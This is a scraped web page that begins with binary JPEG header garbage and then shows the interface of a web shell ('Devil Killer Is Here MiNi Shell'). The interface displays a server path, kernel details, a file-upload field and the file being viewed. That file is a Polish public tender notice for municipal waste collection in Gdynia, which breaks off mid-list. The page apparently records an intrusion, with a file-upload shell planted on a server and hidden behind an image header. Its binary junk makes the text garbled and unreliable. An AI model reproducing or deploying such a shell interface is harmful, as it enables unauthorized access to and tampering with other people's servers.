JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211104/0025698901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa odbioru odpadów komunalnych z obiektów administrowanych przez Zarząd Budynków i Lokali Komunalnych w Gdyni </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD BUDYNKÓW I LOKALI KOMUNALNYCH W GDYNI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 360995521</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Hugo Kołłątaja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-332</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zbilk.gdynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zbilk.gdynia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa odbioru odpadów komunalnych z obiektów administrowanych przez Zarząd Budynków i Lokali Komunalnych w Gdyni </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-67b70825-3bcf-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00256989</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001579/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa odbioru odpadów komunalnych z gminnych budynków użytkowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zbilkgdynia/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/zbilkgdynia/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej systemu SmartPZP zapewniającego obsługę procesu udzielania zamówień publicznych za pośrednictwem środków komunikacji elektronicznej, zwanego dalej Systemem.<br/>System jest dostępny pod adresem: https://portal.smartpzp.pl/zbilkgdynia/, z kolei instrukcje dotyczące systemu znajdują się pod adresem: https://portal.smartpzp.pl/zbilkgdynia/elearning<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta w Systemie, ani logowania do Systemu<br/>Za pośrednictwem posiadanego w Systemie konta Użytkownika Zewnętrznego odbywa się komunikacja Wykonawcy z Zamawiającym w postępowaniu, w szczególności: przekazywanie ofert i dokumentów, oświadczeń, informacji, pytań, wniosków w ramach postępowania. Za pośrednictwem posiadanego w Systemie konta Jednostki Zamawiającej oraz kont jej Użytkowników Wewnętrznych odbywa się komunikacja Zamawiającego z Wykonawcą w postępowaniu, w szczególności: przekazywanie wezwań i zawiadomień, informacji, odpowiedzi na pytania.Zadawanie pytań przez Wykonawców odbywa się w zakładce „Pytania do postępowania”. Zarówno przed jak i po otwarciu ofert, komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej (czyli opatrzoną podpisem kwalifikowanym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym za pośrednictwem Platformy, w zakładce „Korespondencja”, która dla Wykonawcy jest widoczna w Zakładce „Oferty”, po zaznaczeniu numeru złożonej oferty. Za datę wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje się datę zapisania plików na serwerze. Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu Systemu.<br/>Do pełnego i prawidłowego korzystania z Systemu przez Użytkowników Zewnętrznych konieczne jest posiadanie przez co najmniej jednego uprawnionego Użytkownika Zewnętrznego Wykonawcy elektronicznego podpisu kwalifikowanego lub podpisu zaufanego lub podpisu osobistego służącego do autentykacji i podpisu. Korzystanie z Systemu możliwe jest na 2 sposoby, pod warunkiem spełnienia następujących minimalnych wymagań technicznych: 1)	Oprogramowanie zewnętrzne (dostawcy podpisu kwalifikowanego)a)	Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11;b)	Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji przeglądarek;c)	system operacyjny Windows 7 i późniejsze.<br/>2) Oprogramowanie wbudowane w SmartPZP<br/>a)	zainstalowane środowisko Java w wersji min. 1.8 (jre);<br/>b)	w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web;<br/>c)	oprogramowanie SzafirHost w systemie operacyjnym.<br/>Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu wynosi 100 MB. Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików.<br/>Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwanym dalej „RODO”, informuję, że: <br/>1.	administratorem Pani/Pana danych osobowych jest Zarząd Budynków i Lokali Komunalnych w Gdyni jednostka budżetowa,<br/>2.	kontakt do inspektora ochrony danych osobowych w Zarządzie Budynków i Lokali Komunalnych w Gdyni: iod@zbilk.gdynia.pl,<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie:<br/>1)	art. 6 ust. 1 lit c RODO w związku z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. 2019 poz. 2019 z późn. zm.) (zwanej dalej Ustawą Pzp) w celu przeprowadzenia i rozstrzygnięcia postępowania o udzielenie zamówienia publicznego,<br/>2)	art. 6 ust. 1 lit. b RODO w celu zawarcia z wybranym wykonawcą umowy <br/>w sprawie zamówienia publicznego i wykonanie tej umowy;<br/>4.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art 18, art. 74, z ograniczeniami wynikającymi z art. 18 ust 5 i ust.6, Ustawy Pzp lub na podstawie ustawy z dnia 06 września 2001r. o dostępie do informacji publicznej oraz partnerzy świadczący usługi techniczne, firmy archiwizujące dokumenty, operator pocztowy;<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 oraz ust. 4 Ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp, <br/>7.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>8.	posiada Pani/Pan:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych,<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>9.	nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">10.	Zgodnie z art. 19 ustawy PZP:<br/>1)	skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>2)	w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZBILK.IZ.MK.241.P.16.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W zakresie usługi dla części I zamówienia:<br/>1.	Wykonawca zobowiązany jest do systematycznego odbioru i wywozu odpadów komunalnych z następującego budynku/obiektu: <br/>Budynek biurowy przy ul. 10 Lutego 24 w Gdyni, rodzaj odpadów: <br/>a)	odpady zmieszane,<br/>b)	odpady selektywne;<br/>2.	Odpady będą gromadzone przez Zamawiającego w następujących pojemnikach i odbierane przez Wykonawcę wg następującego harmonogramu: <br/>Budynek biurowy przy ul. 10 Lutego 24 w Gdyni: <br/><br/>L.p	Pojemniki <br/>o pojemności<br/> w m3	Rodzaj odpadu	Częstotliwość odbioru odpadów <br/>1	7,00	Zmieszane	2 razy w tygodniu do godz. 7:00<br/>2	1,10	Plastik	1 raz w tygodniu do godz. 7:00<br/>3	1,10	Papier	1 raz w tygodniu do godz. 7:00<br/>4	1,10	Szkło	2 razy w miesiącu do godz. 7:00<br/>5	0,24	Bio	2 razy w miesiącu do godz. 7:00<br/>W zakresie obowiązków Wykonawcy jest mycie i dezynfekcja kontenerów i pojemników, według poniższego harmonogramu:<br/>	kontener na odpady zmieszane 5-krotne umycie w terminie realizacji umowy, każdorazowo na podstawie uzgodnień z Zamawiającym;<br/>	pojemniki na odpady selektywne – o ile wystąpi potrzeba 1-krotne umycie w terminie realizacji umowy, na podstawie uzgodnień z Zamawiającym. Zamawiający może zrezygnować z umycia jednego z pojemników na rzecz innego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 54498,97 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W kryterium cena wg wzoru P(Co)=Cmin/Cb x 60pkt<br/>gdzie:<br/>P(Co) – Ilość przyznanych punktów w Kryterium Cena<br/>Cmin – najniższa cena wśród złożonych ofert nie podlegających odrzuceniu<br/>Cb – oferta badanej oferty<br/>	w kryterium „termin płatności” z deklarowanym terminem:<br/>a)Wymagany minimalny termin płatności – 21 dni: 0 punktów;<br/> b)Termin płatności – 25 dni: 20 punktów;<br/> c) Maksymalny termin płatności – 30 dni: 40 punktów; <br/>Liczba punktów zostanie wyliczona do dwóch miejsc po przecinku, bez zaokrąglania.<br/>Jako najkorzystniejsza zostanie wybrana oferta, która uzyska najwyższą łączną ilość punktów w obydwóch kryteriach spośród ofert nieodrzuconych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W zakresie usługi dla części II zamówienia:<br/>1.	Wykonawca zobowiązany jest do systematycznego odbioru i wywozu odpadów komunalnych z następującego budynku/obiektu: <br/>Budynek biurowy przy ul. Kartuskiej 20B w Gdyni, rodzaj odpadów: <br/>a)	odpady zmieszane,<br/>b)	odpady selektywne<br/>2.	Odpady będą gromadzone przez Zamawiającego w następujących pojemnikach i odbierane przez Wykonawcę wg następującego harmonogramu: <br/>Budynek biurowy przy ul. Kartuskiej 20B w Gdyni: <br/><br/>L.p	Pojemniki <br/>o pojemności<br/> w m3	Rodzaj odpadu	Częstotliwość odbioru odpadów <br/>1	0,24	Zmieszane	1 raz w tygodniu do godz. 7:00<br/>2	0,24	Plastik	2 razy w miesiącu do godz. 7:00<br/>3	0,24	Papier	1 raz w tygodniu do godz. 7:00<br/>4	0,12	Szkło	1 raz w miesiącu do godz. 7:00<br/>5	0,12	Bio	1 raz w miesiącu do godz. 7:00<br/>W zakresie obowiązków Wykonawcy jest mycie i dezynfekcja kontenerów i pojemników, według poniższego harmonogramu :<br/>	kontener na odpady zmieszane 5-krotne umycie w terminie realizacji umowy, każdorazowo na podstawie uzgodnień z Zamawiającym;<br/>pojemniki na odpady selektywne – o ile wystąpi potrzeba 1-krotne umycie w terminie realizacji umowy, na podstawie uzgodnień z Zamawiającym. Zamawiający może zrezygnować z umycia jednego z pojemników na rzecz innego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3808,32 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W kryterium cena wg wzoru P(Co)=Cmin/Cb x 60pkt<br/>gdzie:<br/>P(Co) – Ilość przyznanych punktów w Kryterium Cena<br/>Cmin – najniższa cena wśród złożonych ofert nie podlegających odrzuceniu<br/>Cb – oferta badanej oferty<br/>	w kryterium „termin płatności” z deklarowanym terminem:<br/>a)Wymagany minimalny termin płatności – 21 dni: 0 punktów;<br/> b)Termin płatności – 25 dni: 20 punktów;<br/> c) Maksymalny termin płatności – 30 dni: 40 punktów; <br/>Liczba punktów zostanie wyliczona do dwóch miejsc po przecinku, bez zaokrąglania.<br/>Jako najkorzystniejsza zostanie wybrana oferta, która uzyska najwyższą łączną ilość punktów w obydwóch kryteriach spośród ofert nieodrzuconych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W zakresie usługi dla części III zamówienia:<br/>1.	Wykonawca zobowiązany jest do systematycznego odbioru i wywozu odpadów komunalnych (zmieszanych i selektywnych) z następujących budynków/obiektów położonych w Gdyni przy ulicach: <br/>1)	Morska 97,<br/>2)	Widna 8,<br/>3)	Zakręt do Oksywia 10,<br/>4)	Morska 217. <br/>2.	Odpady będą gromadzone przez Zamawiającego w następujących pojemnikach i odbierane przez Wykonawcę wg następującego harmonogramu: <br/>1)	Odpady z Baru Mlecznego przy ul. Morska 97 w Gdyni: <br/>L.p	Pojemniki o pojemności<br/> w m3	Rodzaj odpadu	Częstotliwość odbioru odpadów <br/>1	0,24	Zmieszane	2 razy w tygodniu do godz. 7:00<br/>2	0,24	Plastik	1 raz w tygodniu do godz. 7:00<br/>3	0,24	Papier	1 raz w tygodniu do godz. 7:00<br/>4	0,24	Szkło	1 raz w tygodniu do godz. 7:00<br/>5	0,12	Bio	1 raz w tygodniu do godz. 7:00<br/><br/>2)	Budynek przy ul. Widna 8 w Gdyni: <br/>L.p	Pojemniki o pojemności<br/> w m3	Rodzaj odpadu	Częstotliwość odbioru odpadów <br/>1	0,12	Zmieszane	2 razy w tygodniu do godz. 7:00<br/>2	worek	Plastik	1 raz w tygodniu do godz. 7:00<br/>3	worek	Papier	1 raz 